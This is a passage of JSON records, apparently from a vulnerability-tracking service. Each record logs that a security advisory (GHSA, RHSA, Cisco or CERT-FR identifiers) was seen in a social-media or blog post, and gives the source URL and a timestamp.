"2025-01-13T20:59:33.692045Z"}, {"uuid": "20880230-1e14-446d-956a-fcc22931da8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0299", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113825801178667187", "content": "", "creation_timestamp": "2025-01-14T08:38:10.715889Z"}, {"uuid": "4ca8c924-4f5a-4411-a694-32f35c36bfec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0300", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113825801178667187", "content": "", "creation_timestamp": "2025-01-14T08:38:10.754064Z"}, {"uuid": "fd2d3e9c-1ebf-46a2-9d5d-d9f63bf40f2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-prcj-7rvc-26h4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113793587594187900", "content": "", "creation_timestamp": "2025-01-08T16:05:50.381995Z"}, {"uuid": "843e43ec-9b66-4493-8ea5-0cc87fb8bbd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r5ph-xg7q-xfrp", "type": "seen", "source": "https://github.blog/open-source/git/git-security-vulnerabilities-announced-5/", "content": "", "creation_timestamp": "2025-01-14T17:04:36.000000Z"}, {"uuid": "8eb817df-4e98-4cd9-be93-538df9ae0001", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qm7j-c969-7j4q", "type": "seen", "source": "https://github.blog/open-source/git/git-security-vulnerabilities-announced-5/", "content": "", "creation_timestamp": "2025-01-14T17:04:36.000000Z"}, {"uuid": "5fcd9e12-e1ee-4fee-af1b-5274b53c76fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ffhj-hprx-7qvr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113787932656548061", "content": "", "creation_timestamp": "2025-01-07T16:07:43.418263Z"}, {"uuid": "5a8b5d23-505f-4220-8395-80d33972cbdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-55wq-2hgm-75m4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113788514243444533", "content": "", "creation_timestamp": "2025-01-07T18:35:37.095349Z"}, {"uuid": "eecaf9cc-3921-44b0-ac71-9a577e1be732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hmg8-h7qf-7cxr", "type": "seen", "source": "https://github.blog/open-source/git/git-security-vulnerabilities-announced-5/", "content": "", "creation_timestamp": "2025-01-14T17:04:36.000000Z"}, {"uuid": "6913b5d1-03ed-4bae-bbc3-319954da8fa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-36mm-rh9q-cpqq", "type": "seen", "source": "https://github.blog/open-source/git/git-security-vulnerabilities-announced-5/", "content": "", "creation_timestamp": "2025-01-14T17:04:36.000000Z"}, {"uuid": "8872dffa-ef97-465d-a204-1c5868b97225", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q6r2-x2cc-vrp7", "type": "seen", "source": "https://github.blog/open-source/git/git-security-vulnerabilities-announced-5/", "content": "", "creation_timestamp": "2025-01-14T17:04:36.000000Z"}, {"uuid": "f17e7cf8-8289-4c50-a677-50387beb4c98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5qpx-23rw-36gg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113787932641923201", "content": "", "creation_timestamp": "2025-01-07T16:07:42.783429Z"}, {"uuid": "00d74753-f827-4815-ad42-2b8103c8fc05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq4h-w933-jm6c", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113742682794610427", "content": "", "creation_timestamp": "2024-12-30T16:20:04.689703Z"}, {"uuid": "ffe6e4eb-47ab-42ba-b64f-edbeef4ac5cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-36cc-58vm-wm4h", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113742729529291973", "content": "", "creation_timestamp": "2024-12-30T16:31:57.820813Z"}, {"uuid": "e5d1dddb-5d1b-44e0-a059-c2ae0d2da516", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ggwq-xc72-33r3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113742766801800257", "content": "", "creation_timestamp": "2024-12-30T16:41:26.544312Z"}, {"uuid": "0786425b-b42b-4f36-a2c5-7b9587892b9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4fwj-m62q-pp47", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113742795180540697", "content": "", "creation_timestamp": "2024-12-30T16:48:39.621032Z"}, {"uuid": "c0a1fbc1-5b29-4074-8f85-02ccd2c5aacd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8jhw-6pjj-8723", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113742892903396443", "content": "", "creation_timestamp": "2024-12-30T17:13:30.890161Z"}, {"uuid": "9622aaa4-743e-47d2-bf4b-6dd84c339c00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c6fw-xw9x-gwjw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113743149419974697", "content": "", "creation_timestamp": "2024-12-30T18:18:44.922000Z"}, {"uuid": "a6590c84-6d4e-4b01-a8fe-de31bd795042", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-83qw-5qq5-v7pq", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113743201022428847", "content": "", "creation_timestamp": "2024-12-30T18:31:52.274341Z"}, {"uuid": "f7baa758-2067-4d8e-a1cb-359266c346f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vjp8-2wgg-p734", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113743201037683692", "content": "", "creation_timestamp": "2024-12-30T18:31:52.592866Z"}, {"uuid": "0ed06dc7-d593-43ce-a9c8-7ea78cc36daf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rj9m-qf65-f5gg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113748100084170494", "content": "", "creation_timestamp": "2024-12-31T15:17:46.034960Z"}, {"uuid": "38cec039-7cec-45ff-8bb8-43f2de1dcc6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94p5-r7cc-3rpr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113748138515723202", "content": "", "creation_timestamp": "2024-12-31T15:27:32.348301Z"}, {"uuid": "ec25149e-1904-4a18-81c6-d3f9e4431e23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5hcq-3j4q-4v6p", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113749897141823585", "content": "", "creation_timestamp": "2024-12-31T22:54:46.937726Z"}, {"uuid": "8ed23289-5dba-4aed-8b34-51f337964830", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2vpg-j5jh-j22x", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823651421099770", "content": "", "creation_timestamp": "2025-01-13T23:31:27.869781Z"}, {"uuid": "6aff556e-b900-43c4-8ee4-b7250c6e9eef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rjjp-w2wm-7f9j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823651435759931", "content": "", "creation_timestamp": "2025-01-13T23:31:28.227343Z"}, {"uuid": "87ba03c1-4c43-40d4-b413-549bd16287ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c6qg-cjj8-47qp", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113795675438289340", "content": "", "creation_timestamp": "2025-01-09T00:56:48.519076Z"}, {"uuid": "45d63f88-4c0f-468b-8cf8-6c0c0d2697fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h8hr-jhcx-fcv9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113789358194226275", "content": "", "creation_timestamp": "2025-01-07T22:10:14.763766Z"}, {"uuid": "8255197e-713e-4c6b-98da-eba6b0d90f7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mjgr-2jxv-v8qf", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113789358208827936", "content": "", "creation_timestamp": "2025-01-07T22:10:15.122416Z"}, {"uuid": "0d593a9a-dcd7-4280-af31-85e9bb86e0fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pm87-24wq-r8w9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113791870409998283", "content": "", "creation_timestamp": "2025-01-08T08:49:08.194848Z"}, {"uuid": "e3bd3793-6a6b-4423-845e-2702cf47ffb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-002", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lfxakzi2ev2w", "content": "", "creation_timestamp": "2025-01-17T16:45:05.554960Z"}, {"uuid": "68f61d59-66af-45f2-89e4-adddf9ac0a65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3pqh-p72c-fj85", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113911088253196556", "content": "", "creation_timestamp": "2025-01-29T10:07:48.057302Z"}, {"uuid": "43fa40d9-a8c6-415f-a1c4-6ba84b343db4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3j9m-cp35-94fr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947120626335280", "content": "", "creation_timestamp": "2025-02-04T18:51:18.429758Z"}, {"uuid": "fc0db6d3-493f-44dc-9306-96033914a030", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-82j3-hf72-7x93", "type": "seen", "source": "https://github.blog/security/vulnerability-research/attacks-on-maven-proxy-repositories/", "content": "", "creation_timestamp": "2025-01-22T17:00:51.000000Z"}, {"uuid": "80545ef3-5d72-4afb-8fd6-07426ac30f48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rx8m-jqm7-vcgp", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947144108335156", "content": "", "creation_timestamp": "2025-02-04T18:57:16.928939Z"}, {"uuid": "0cf03f71-ed3f-4cd4-b75c-fed311632e2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-frvj-cfq4-3228", "type": "seen", "source": "https://github.blog/security/vulnerability-research/attacks-on-maven-proxy-repositories/", "content": "", "creation_timestamp": "2025-01-22T17:00:51.000000Z"}, {"uuid": "c7bdf03e-bb44-4578-bc8e-8174c42e1513", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://bsky.app/profile/hnbot.gsuscs.xyz/post/3lhca3fafnc2f", "content": "", "creation_timestamp": "2025-02-03T19:00:50.304447Z"}, {"uuid": "331a8dec-24bc-4275-bf69-42cf79ba7c16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pxg6-pf52-xh8x", "type": "seen", "source": "https://gist.github.com/twyststar/52c9efd0ef5a1f2e79f7db1492b8a405", "content": "", "creation_timestamp": "2025-01-25T16:00:15.000000Z"}, {"uuid": "e613cd2b-5d39-41cb-a7ee-5f7902b770a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://bsky.app/profile/betterhn20.e-work.xyz/post/3lhcbmubpiz23", "content": "", "creation_timestamp": "2025-02-03T19:28:30.023251Z"}, {"uuid": "8c088ad5-d6d2-4b1e-9ba1-e3de12273d1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j855-mhxj-x6vg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947614956436564", "content": "", "creation_timestamp": "2025-02-04T20:57:01.379216Z"}, {"uuid": "457a2f92-4b17-48ea-ac75-6cb2c470021b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gvpp-v7mp-wxxw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947614990713817", "content": "", "creation_timestamp": "2025-02-04T20:57:01.993972Z"}, {"uuid": "92a8977f-7222-42a8-b7a3-317f9da6b7ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcjx-694p-c5m3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947615005883636", "content": "", "creation_timestamp": "2025-02-04T20:57:02.178878Z"}, {"uuid": "cfcfa0a9-17d5-4bef-9a40-38ba196029cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xmgr-g9cp-v239", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947638509402541", "content": "", "creation_timestamp": "2025-02-04T21:03:00.688294Z"}, {"uuid": "fd6fc7fb-9bbd-4334-90ea-b208169127c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2352-252q-qc82", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947671170575758", "content": "", "creation_timestamp": "2025-02-04T21:11:19.067170Z"}, {"uuid": "b74e1036-8fa0-42cd-a36f-b089a98c4509", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180207-cucm", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342705227470", "content": "", "creation_timestamp": "2024-12-17T09:00:36.040612Z"}, {"uuid": "dd1e2ce0-c2bd-4bea-8b67-e9fb5adb9b0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180824-linux", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342730022657", "content": "", "creation_timestamp": "2024-12-17T09:00:36.262940Z"}, {"uuid": "3187d707-1ee9-40b4-8703-1111acfd38a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20181017-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342760830380", "content": "", "creation_timestamp": "2024-12-17T09:00:36.499405Z"}, {"uuid": "b542c0bd-5cc8-4ee4-b1d4-508f8f81f3c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20200122-uc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342769792468", "content": "", "creation_timestamp": "2024-12-17T09:00:36.637625Z"}, {"uuid": "79be7231-d53a-4a5b-af37-127475a7513d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190109-webex", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342774114120", "content": "", "creation_timestamp": "2024-12-17T09:00:36.702783Z"}, {"uuid": "4df07c2d-564a-4c6b-9985-3e05fda58d87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190703-ccapic", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342765297112", "content": "", "creation_timestamp": "2024-12-17T09:00:36.773399Z"}, {"uuid": "1275dbac-7e24-4a02-a135-b22ca03b324b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190828-iosxe", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342778861438", "content": "", "creation_timestamp": "2024-12-17T09:00:36.836984Z"}, {"uuid": "d55e7f33-7c33-41c1-8c3c-1b427badeeb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180905-cpar", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342796592974", "content": "", "creation_timestamp": "2024-12-17T09:00:36.906465Z"}, {"uuid": "dfcfdf2f-aa06-4763-81a8-1c7538db8770", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180620-nxossnmp", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342829939583", "content": "", "creation_timestamp": "2024-12-17T09:00:37.045078Z"}, {"uuid": "048a6a1f-d0e5-4f2b-9597-5684271f8381", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180606-aaa", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342807879355", "content": "", "creation_timestamp": "2024-12-17T09:00:37.116519Z"}, {"uuid": "1e3e153e-db26-470c-b39b-eab5f0455764", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190515-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342820066770", "content": "", "creation_timestamp": "2024-12-17T09:00:37.183066Z"}, {"uuid": "91dbbd12-7917-44fa-a414-dd5c81955954", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190807-nfv", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342840112322", "content": "", "creation_timestamp": "2024-12-17T09:00:37.250645Z"}, {"uuid": "17f577c4-f45c-4c37-97b5-9742b952280d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190306-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113667342835692703", "content": "", "creation_timestamp": "2024-12-17T09:00:37.313640Z"}, {"uuid": "b3c5dc2d-289f-4210-bc1c-68c00b33b6a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mfqp-7mmj-rm53", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113675507912279037", "content": "", "creation_timestamp": "2024-12-18T19:36:37.366306Z"}, {"uuid": "6264152e-ac73-47ff-9f0f-a80cb05f96af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q9qv-8j52-77p3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113675507926963180", "content": "", "creation_timestamp": "2024-12-18T19:36:37.932487Z"}, {"uuid": "0da26fc1-61f9-49f3-8e7a-f6ec96e01d17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3hh8-94j4-62rh", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113684821511303214", "content": "", "creation_timestamp": "2024-12-20T11:05:11.677703Z"}, {"uuid": "c120248d-300d-4f18-80f1-d70751cd81a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7gfc-8cq8-jh5f", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113669566323116247", "content": "", "creation_timestamp": "2024-12-17T18:25:35.844789Z"}, {"uuid": "c0249844-a3b0-415f-8474-a5912766cf11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgvf-4pf3-fwc9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113669618182463708", "content": "", "creation_timestamp": "2024-12-17T18:38:47.190415Z"}, {"uuid": "30f0d758-0e64-4909-95ab-bb4e867a3a09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rmm5-h2wv-mg4f", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113675507940756277", "content": "", "creation_timestamp": "2024-12-18T19:36:38.063457Z"}, {"uuid": "8fee2f96-7c96-4029-b01f-46faa0971f70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qgm-m29m-cj2h", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113686907294716814", "content": "", "creation_timestamp": "2024-12-20T19:55:38.147483Z"}, {"uuid": "f1adc167-aaf5-4731-bd7f-49ac0af1f6fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m9hc-vxjj-4x6q", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113670348307536287", "content": "", "creation_timestamp": "2024-12-17T21:44:28.014148Z"}, {"uuid": "0eac9fff-6e1c-4913-88e8-0a480a0c340a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fm9w-7m7v-wxqv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113670373972746279", "content": "", "creation_timestamp": "2024-12-17T21:50:59.781106Z"}, {"uuid": "7968daad-acab-4420-b2fa-20a6e9a7f746", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6cp9-j5r7-xhcc", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113670373972746279", "content": "", "creation_timestamp": "2024-12-17T21:50:59.816295Z"}, {"uuid": "dc6a3514-3b72-4545-bdfd-4335d5463fb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5jhc-frm4-p8v9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113702816597150919", "content": "", "creation_timestamp": "2024-12-23T15:21:34.817959Z"}, {"uuid": "7e90cb0c-7d59-4184-b422-55c967566e43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r7j8-5h9c-f6fx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113702851132144066", "content": "", "creation_timestamp": "2024-12-23T15:30:21.916135Z"}, {"uuid": "80ad0928-ab4f-487f-96cd-a2de2c7f48f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qf5v-rp47-55gg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113702851146280575", "content": "", "creation_timestamp": "2024-12-23T15:30:22.145682Z"}, {"uuid": "d4996f90-065a-4a24-8d83-0eed3dd54ecf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gmj6-6f8f-6699", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113702902740655867", "content": "", "creation_timestamp": "2024-12-23T15:43:29.279197Z"}, {"uuid": "97a1c5df-b2b6-489d-8eca-ec851782a049", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2j38-pjh8-wfxw", "type": "seen", "source": "https://infosec.exchange/users/edwardk/statuses/113702922768301130", "content": "", "creation_timestamp": "2024-12-23T15:48:34.674728Z"}, {"uuid": "4eb7bd8b-770f-4e95-9ee4-c755ba36c812", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q2x7-8rv6-6q7h", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113702928777162458", "content": "", "creation_timestamp": "2024-12-23T15:50:06.749205Z"}, {"uuid": "6a0e5d90-dd4f-469b-a47e-401c00f091ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r87q-fj25-f8jf", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113702950354491013", "content": "", "creation_timestamp": "2024-12-23T15:55:36.223964Z"}, {"uuid": "a64d9718-9bc3-4cd7-8d4c-f495594d2686", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xwx7-p63r-2rj8", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113703315087550013", "content": "", "creation_timestamp": "2024-12-23T17:28:21.306494Z"}, 